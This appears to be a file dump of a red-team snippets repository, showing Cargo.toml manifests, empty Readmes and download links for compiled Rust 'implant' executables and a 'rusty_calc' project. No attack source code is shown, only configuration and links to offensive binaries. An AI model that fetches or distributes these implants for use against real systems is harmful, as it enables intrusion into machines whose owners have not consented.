https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Rust/rust_implantv2/rusty_implant.exe -------------------------------------------------------------------------------- /Rust/rust_implantv3/Cargo.toml: -------------------------------------------------------------------------------- 1 
| [package] 2 | name = "rusty_implantv2" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | libc = "0.2.139" 10 | sys = "0.0.0" 11 | 12 | 13 | windows-sys = { version = "*", features = [ 14 | "Win32_Security", 15 | "Win32_Foundation", 16 | "Win32_System_Kernel", 17 | "Win32_System_Memory", 18 | "Win32_System_Threading", 19 | "Win32_System_LibraryLoader", 20 | "Win32_System_SystemServices", 21 | "Win32_System_SystemInformation", 22 | "Win32_System_Diagnostics_Debug", 23 | "Win32_System_WindowsProgramming", 24 | 25 | 26 | ] } 27 | -------------------------------------------------------------------------------- /Rust/rust_implantv3/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Rust/rust_implantv3/rusty_implantv3.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Rust/rust_implantv3/rusty_implantv3.exe -------------------------------------------------------------------------------- /Rust/rust_implantv4/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "rusty_implantv2" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | libc = "0.2.139" 10 | sys = "0.0.0" 11 | 12 | 13 | windows-sys = { version = "*", features = [ 14 | "Win32_Security", 15 | "Win32_Foundation", 16 | "Win32_System_Kernel", 17 | "Win32_System_Memory", 18 | "Win32_System_Threading", 19 | "Win32_System_LibraryLoader", 20 | "Win32_System_SystemServices", 21 | "Win32_System_SystemInformation", 22 | 
"Win32_System_Diagnostics_Debug", 23 | "Win32_System_WindowsProgramming", 24 | 25 | 26 | ] } 27 | -------------------------------------------------------------------------------- /Rust/rust_implantv4/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Rust/rust_implantv4/rusty_implantv4.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Rust/rust_implantv4/rusty_implantv4.exe -------------------------------------------------------------------------------- /Rust/rusty_calc/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "rusty_calc" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [profile.release] 9 | opt-level = 0 10 | 11 | 12 | 13 | [dependencies] 14 | errno = "0.2.8" 15 | libc = "0.2.139" 16 | windows-sys = {version = "0.42.0", features=["Win32_System_Memory", "Win32_Foundation", "Win32_System_Threading", 17 | "Win32_Security", "Win32_System_Diagnostics_Debug","Win32_System_LibraryLoader"]} 18 | -------------------------------------------------------------------------------- /Rust/rusty_calc/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | --------------------------------------------------------------------------------